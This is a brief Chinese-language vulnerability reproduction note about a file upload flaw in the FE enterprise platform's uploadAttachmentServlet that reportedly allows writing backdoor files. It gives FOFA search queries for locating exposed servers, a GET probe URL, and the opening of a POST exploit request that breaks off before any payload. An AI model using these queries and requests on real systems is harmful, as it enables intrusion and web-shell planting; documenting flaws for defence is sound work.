简介
飞企互联-FE企业运营管理平台 uploadAttachmentServlet存在文件上传漏洞,攻击者可通过该漏洞在服务器端写入后门文件。
漏洞复现
FOFA语法:
icon_hash="-1159839950"
app=“FE-协作平台”
访问界面返回信息如下所示:
POC:
/servlet/uploadAttachmentServlet
GET请求访问: http://ip:port/servlet/uploadAttachmentServlet
返回信息如下所示:
可能存在该漏洞:
验证:
POST /servlet/uploadAttachmentServlet HTTP/1.1
Host:
U